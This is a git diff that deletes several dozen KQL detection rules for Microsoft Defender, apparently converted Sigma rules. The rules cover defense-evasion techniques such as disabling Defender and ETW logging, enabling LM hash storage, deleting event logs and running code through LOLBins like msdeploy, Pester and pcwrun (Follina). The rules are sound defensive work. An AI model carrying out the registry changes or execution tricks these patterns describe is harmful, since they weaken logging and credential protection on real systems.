-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/07/04
-// Level: high
-// Description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Windows Defender/Operational\\Enabled"
\ No newline at end of file
diff --git a/Defense Evasion/Diskshadow_Script_Mode_-_Execution_From_Potential_Suspicious_Location.kql b/Defense Evasion/Diskshadow_Script_Mode_-_Execution_From_Potential_Suspicious_Location.kql
deleted file mode 100644
index 9f443b1a..00000000
--- a/Defense Evasion/Diskshadow_Script_Mode_-_Execution_From_Potential_Suspicious_Location.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/15
-// Level: medium
-// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe") and (ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Users\\Public\\")
\ No newline at end of file
diff --git a/Defense Evasion/Diskshadow_Script_Mode_-_Uncommon_Script_Extension_Execution.kql b/Defense Evasion/Diskshadow_Script_Mode_-_Uncommon_Script_Extension_Execution.kql
deleted file mode 100644
index a628f79d..00000000
--- a/Defense Evasion/Diskshadow_Script_Mode_-_Uncommon_Script_Extension_Execution.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/15
-// Level: medium
-// Description: Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension.
-Initial baselining of the allowed extension list is required.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe")) and (not(ProcessCommandLine contains ".txt"))
\ No newline at end of file
diff --git a/Defense Evasion/Dism_Remove_Online_Package.kql b/Defense Evasion/Dism_Remove_Online_Package.kql
deleted file mode 100644
index 78d6b348..00000000
--- a/Defense Evasion/Dism_Remove_Online_Package.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/16
-// Level: medium
-// Description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "/Online" and ProcessCommandLine contains "/Disable-Feature") and FolderPath endswith "\\Dism.exe") or (FolderPath endswith "\\DismHost.exe" and (InitiatingProcessCommandLine contains "/Online" and InitiatingProcessCommandLine contains "/Disable-Feature"))
\ No newline at end of file
diff --git a/Defense Evasion/Displaying_Hidden_Files_Feature_Disabled.kql b/Defense Evasion/Displaying_Hidden_Files_Feature_Disabled.kql
deleted file mode 100644
index 62698c93..00000000
--- a/Defense Evasion/Displaying_Hidden_Files_Feature_Disabled.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/04/02
-// Level: medium
-// Description: Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files.
-This technique is abused by several malware families to hide their files from normal users.
-
-// Tags: attack.defense_evasion, attack.t1564.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden")
\ No newline at end of file
diff --git a/Defense Evasion/DllUnregisterServer_Function_Call_Via_Msiexec.EXE.kql b/Defense Evasion/DllUnregisterServer_Function_Call_Via_Msiexec.EXE.kql
deleted file mode 100644
index cf74575e..00000000
--- a/Defense Evasion/DllUnregisterServer_Function_Call_Via_Msiexec.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/24
-// Level: medium
-// Description: Detects MsiExec loading a DLL and calling its DllUnregisterServer function
-// Tags: attack.defense_evasion, attack.t1218.007
-DeviceProcessEvents
-| where ProcessCommandLine contains ".dll" and (ProcessCommandLine contains " -z " or ProcessCommandLine contains " /z ") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Dllhost.EXE_Execution_Anomaly.kql b/Defense Evasion/Dllhost.EXE_Execution_Anomaly.kql
deleted file mode 100644
index e3208d89..00000000
--- a/Defense Evasion/Dllhost.EXE_Execution_Anomaly.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/27
-// Level: high
-// Description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.
-// Tags: attack.defense_evasion, attack.t1055
-DeviceProcessEvents
-| where ((ProcessCommandLine in~ ("dllhost.exe", "dllhost")) and FolderPath endswith "\\dllhost.exe") and (not(isnull(ProcessCommandLine)))
\ No newline at end of file
diff --git a/Defense Evasion/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql b/Defense Evasion/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql
deleted file mode 100644
index 4a2e8091..00000000
--- a/Defense Evasion/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: bartblaze
-// Date: 2020/07/13
-// Level: medium
-// Description: Detects dllhost initiating a network connection to a non-local IP address.
-Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL.
-An initial baseline is recommended before deployment.
-
-// Tags: attack.defense_evasion, attack.t1218, attack.execution, attack.t1559.001
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\dllhost.exe" and (not(((ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "fc00::/7") or ipv4_is_in_range(RemoteIP, "fe80::/10")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24")))))
\ No newline at end of file
diff --git a/Defense Evasion/Drop_Binaries_Into_Spool_Drivers_Color_Folder.kql b/Defense Evasion/Drop_Binaries_Into_Spool_Drivers_Color_Folder.kql
deleted file mode 100644
index 8c857cd9..00000000
--- a/Defense Evasion/Drop_Binaries_Into_Spool_Drivers_Color_Folder.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/28
-// Level: medium
-// Description: Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where (FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".sys") and FolderPath startswith "C:\\Windows\\System32\\spool\\drivers\\color\\"
\ No newline at end of file
diff --git a/Defense Evasion/DumpMinitool_Execution.kql b/Defense Evasion/DumpMinitool_Execution.kql
deleted file mode 100644
index f7f7fd6a..00000000
--- a/Defense Evasion/DumpMinitool_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022/04/06
-// Level: medium
-// Description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump"
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/DumpStack.log_Defender_Evasion.kql b/Defense Evasion/DumpStack.log_Defender_Evasion.kql
deleted file mode 100644
index a0a25999..00000000
--- a/Defense Evasion/DumpStack.log_Defender_Evasion.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/06
-// Level: critical
-// Description: Detects the use of the filename DumpStack.log to evade Microsoft Defender
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where FolderPath endswith "\\DumpStack.log" or ProcessCommandLine contains " -o DumpStack.log"
\ No newline at end of file
diff --git a/Defense Evasion/Dynamic_.NET_Compilation_Via_Csc.EXE.kql b/Defense Evasion/Dynamic_.NET_Compilation_Via_Csc.EXE.kql
deleted file mode 100644
index ce4a9118..00000000
--- a/Defense Evasion/Dynamic_.NET_Compilation_Via_Csc.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2019/08/24
-// Level: medium
-// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
-// Tags: attack.defense_evasion, attack.t1027.004
-DeviceProcessEvents
-| where FolderPath endswith "\\csc.exe" and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp\\") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\")) or ProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or (InitiatingProcessFolderPath in~ ("C:\\ProgramData\\chocolatey\\choco.exe", "C:\\ProgramData\\chocolatey\\tools\\shimgen.exe")) or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection")))
\ No newline at end of file
diff --git a/Defense Evasion/Dynamic_CSharp_Compile_Artefact.kql b/Defense Evasion/Dynamic_CSharp_Compile_Artefact.kql
deleted file mode 100644
index 030bd66d..00000000
--- a/Defense Evasion/Dynamic_CSharp_Compile_Artefact.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/01/09
-// Level: low
-// Description: When C# is compiled dynamically, a .cmdline file will be created as a part of the process.
-Certain processes are not typically observed compiling C# code, but can do so without touching disk.
-This can be used to unpack a payload for execution
-
-// Tags: attack.defense_evasion, attack.t1027.004
-DeviceFileEvents
-| where FolderPath endswith ".cmdline"
\ No newline at end of file
diff --git a/Defense Evasion/ETW_Logging_Disabled_For_SCM.kql b/Defense Evasion/ETW_Logging_Disabled_For_SCM.kql
deleted file mode 100644
index 8766923b..00000000
--- a/Defense Evasion/ETW_Logging_Disabled_For_SCM.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/09
-// Level: low
-// Description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)
-// Tags: attack.defense_evasion, attack.t1112, attack.t1562
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows NT\\CurrentVersion\\Tracing\\SCM\\Regular\\TracingDisabled"
\ No newline at end of file
diff --git a/Defense Evasion/ETW_Logging_Disabled_For_rpcrt4.dll.kql b/Defense Evasion/ETW_Logging_Disabled_For_rpcrt4.dll.kql
deleted file mode 100644
index ec62c30a..00000000
--- a/Defense Evasion/ETW_Logging_Disabled_For_rpcrt4.dll.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/09
-// Level: low
-// Description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll
-// Tags: attack.defense_evasion, attack.t1112, attack.t1562
-DeviceRegistryEvents
-| where (RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Windows NT\\Rpc\\ExtErrorInformation"
\ No newline at end of file
diff --git a/Defense Evasion/ETW_Logging_Tamper_In_.NET_Processes.kql b/Defense Evasion/ETW_Logging_Tamper_In_.NET_Processes.kql
deleted file mode 100644
index 148555ce..00000000
--- a/Defense Evasion/ETW_Logging_Tamper_In_.NET_Processes.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: high
-// Description: Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
-// Tags: attack.defense_evasion, attack.t1562
-DeviceProcessEvents
-| where ProcessCommandLine contains "COMPlus_ETWEnabled" or ProcessCommandLine contains "COMPlus_ETWFlags"
\ No newline at end of file
diff --git a/Defense Evasion/EVTX_Created_In_Uncommon_Location.kql b/Defense Evasion/EVTX_Created_In_Uncommon_Location.kql
deleted file mode 100644
index ee7f0473..00000000
--- a/Defense Evasion/EVTX_Created_In_Uncommon_Location.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: D3F7A5105
-// Date: 2023/01/02
-// Level: medium
-// Description: Detects the creation of new files with the ".evtx" extension in non-common or non-standard location.
-This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within.
-Note that backup software and legitimate administrator might perform similar actions during troubleshooting.
-
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceFileEvents
-| where FolderPath endswith ".evtx" and (not(((FolderPath endswith "\\Windows\\System32\\winevt\\Logs\\" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows\\Containers\\BaseImages\\") or FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Enable_LM_Hash_Storage.kql b/Defense Evasion/Enable_LM_Hash_Storage.kql
deleted file mode 100644
index 2ae9a54e..00000000
--- a/Defense Evasion/Enable_LM_Hash_Storage.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/12/15
-// Level: high
-// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
-By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\NoLMHash"
\ No newline at end of file
diff --git a/Defense Evasion/Enable_LM_Hash_Storage_-_ProcCreation.kql b/Defense Evasion/Enable_LM_Hash_Storage_-_ProcCreation.kql
deleted file mode 100644
index 3d5fa187..00000000
--- a/Defense Evasion/Enable_LM_Hash_Storage_-_ProcCreation.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/12/15
-// Level: high
-// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
-By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "NoLMHash" and ProcessCommandLine contains " 0"
\ No newline at end of file
diff --git a/Defense Evasion/Enable_Local_Manifest_Installation_With_Winget.kql b/Defense Evasion/Enable_Local_Manifest_Installation_With_Winget.kql
deleted file mode 100644
index d6abdc89..00000000
--- a/Defense Evasion/Enable_Local_Manifest_Installation_With_Winget.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.
-// Tags: attack.defense_evasion, attack.persistence
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\AppInstaller\\EnableLocalManifestFiles"
\ No newline at end of file
diff --git a/Defense Evasion/Enable_Remote_Connection_Between_Anonymous_Computer_-_AllowAnonymousCallback.kql b/Defense Evasion/Enable_Remote_Connection_Between_Anonymous_Computer_-_AllowAnonymousCallback.kql
deleted file mode 100644
index 771adbd0..00000000
--- a/Defense Evasion/Enable_Remote_Connection_Between_Anonymous_Computer_-_AllowAnonymousCallback.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/11/03
-// Level: medium
-// Description: Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\WBEM\\CIMOM\\AllowAnonymousCallback"
\ No newline at end of file
diff --git a/Defense Evasion/Enabling_COR_Profiler_Environment_Variables.kql b/Defense Evasion/Enabling_COR_Profiler_Environment_Variables.kql
deleted file mode 100644
index 37c43d0b..00000000
--- a/Defense Evasion/Enabling_COR_Profiler_Environment_Variables.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)
-// Date: 2020/09/10
-// Level: medium
-// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.012
-DeviceRegistryEvents
-| where (RegistryKey endswith "\\COR_ENABLE_PROFILING" or RegistryKey endswith "\\COR_PROFILER" or RegistryKey endswith "\\CORECLR_ENABLE_PROFILING") or RegistryKey contains "\\CORECLR_PROFILER_PATH"
\ No newline at end of file
diff --git a/Defense Evasion/EventLog_EVTX_File_Deleted.kql b/Defense Evasion/EventLog_EVTX_File_Deleted.kql
deleted file mode 100644
index 2e9420ac..00000000
--- a/Defense Evasion/EventLog_EVTX_File_Deleted.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: medium
-// Description: Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070
-DeviceFileEvents
-| where FolderPath endswith ".evtx" and FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\"
\ No newline at end of file
diff --git a/Defense Evasion/Exchange_PowerShell_Cmdlet_History_Deleted.kql b/Defense Evasion/Exchange_PowerShell_Cmdlet_History_Deleted.kql
deleted file mode 100644
index a124be21..00000000
--- a/Defense Evasion/Exchange_PowerShell_Cmdlet_History_Deleted.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/26
-// Level: high
-// Description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070
-DeviceFileEvents
-| where FolderPath contains "_Cmdlet_" and FolderPath startswith "\\Logging\\CmdletInfra\\LocalPowerShell\\Cmdlet\\"
\ No newline at end of file
diff --git a/Defense Evasion/Execute_Code_with_Pester.bat.kql b/Defense Evasion/Execute_Code_with_Pester.bat.kql
deleted file mode 100644
index 0676e78a..00000000
--- a/Defense Evasion/Execute_Code_with_Pester.bat.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Julia Fomina, oscd.community
-// Date: 2020/10/08
-// Level: medium
-// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "Pester" and ProcessCommandLine contains "Get-Help") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "pester" and ProcessCommandLine contains ";") and FolderPath endswith "\\cmd.exe") and (ProcessCommandLine contains "help" or ProcessCommandLine contains "?"))
\ No newline at end of file
diff --git a/Defense Evasion/Execute_Code_with_Pester.bat_as_Parent.kql b/Defense Evasion/Execute_Code_with_Pester.bat_as_Parent.kql
deleted file mode 100644
index 7a116895..00000000
--- a/Defense Evasion/Execute_Code_with_Pester.bat_as_Parent.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/08/20
-// Level: medium
-// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "{ Invoke-Pester -EnableExit ;" or InitiatingProcessCommandLine contains "{ Get-Help \"") and (InitiatingProcessCommandLine contains "\\WindowsPowerShell\\Modules\\Pester\\" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Execute_Files_with_Msdeploy.exe.kql b/Defense Evasion/Execute_Files_with_Msdeploy.exe.kql
deleted file mode 100644
index b557d443..00000000
--- a/Defense Evasion/Execute_Files_with_Msdeploy.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community
-// Date: 2020/10/18
-// Level: medium
-// Description: Detects file execution using the msdeploy.exe lolbin
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "verb:sync" and ProcessCommandLine contains "-source:RunCommand" and ProcessCommandLine contains "-dest:runCommand") and FolderPath endswith "\\msdeploy.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Execute_From_Alternate_Data_Streams.kql b/Defense Evasion/Execute_From_Alternate_Data_Streams.kql
deleted file mode 100644
index 39de86ed..00000000
--- a/Defense Evasion/Execute_From_Alternate_Data_Streams.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/09/01
-// Level: medium
-// Description: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where ProcessCommandLine contains "txt:" and ((ProcessCommandLine contains "esentutl " and ProcessCommandLine contains " /y " and ProcessCommandLine contains " /d " and ProcessCommandLine contains " /o ") or (ProcessCommandLine contains "makecab " and ProcessCommandLine contains ".cab") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains " export ") or (ProcessCommandLine contains "regedit " and ProcessCommandLine contains " /E ") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > "))
\ No newline at end of file
diff --git a/Defense Evasion/Execute_MSDT_Via_Answer_File.kql b/Defense Evasion/Execute_MSDT_Via_Answer_File.kql
deleted file mode 100644
index 3ce729d9..00000000
--- a/Defense Evasion/Execute_MSDT_Via_Answer_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/13
-// Level: high
-// Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab)
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af ") and (ProcessCommandLine contains "\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml" and FolderPath endswith "\\msdt.exe")) and (not(InitiatingProcessFolderPath endswith "\\pcwrun.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Execute_Pcwrun.EXE_To_Leverage_Follina.kql b/Defense Evasion/Execute_Pcwrun.EXE_To_Leverage_Follina.kql
deleted file mode 100644
index b385a85e..00000000
--- a/Defense Evasion/Execute_Pcwrun.EXE_To_Leverage_Follina.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/13
-// Level: high
-// Description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "../" and FolderPath endswith "\\pcwrun.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Execution_DLL_of_Choice_Using_WAB.EXE.kql b/Defense Evasion/Execution_DLL_of_Choice_Using_WAB.EXE.kql
deleted file mode 100644
index 03ab5746..00000000
--- a/Defense Evasion/Execution_DLL_of_Choice_Using_WAB.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Natalia Shornikova
-// Date: 2020/10/13
-// Level: high
-// Description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Software\\Microsoft\\WAB\\DLLPath" and (not(RegistryValueData =~ "%CommonProgramFiles%\\System\\wab32.dll"))
\ No newline at end of file
diff --git a/Defense Evasion/Execution_Of_Non-Existing_File.kql b/Defense Evasion/Execution_Of_Non-Existing_File.kql
deleted file mode 100644
index 21d8dc22..00000000
--- a/Defense Evasion/Execution_Of_Non-Existing_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2021/12/09
-// Level: high
-// Description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (not(FolderPath contains "\\")) and (not((((FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or (ProcessCommandLine in~ ("Registry", "MemCompression", "vmmem"))) or (FolderPath in~ ("-", "")) or isnull(FolderPath))))
\ No newline at end of file
diff --git a/Defense Evasion/Execution_from_Suspicious_Folder.kql b/Defense Evasion/Execution_from_Suspicious_Folder.kql
deleted file mode 100644
index 41e17b99..00000000
--- a/Defense Evasion/Execution_from_Suspicious_Folder.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Tim Shelton
-// Date: 2019/01/16
-// Level: high
-// Description: Detects a suspicious execution from an uncommon folder
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
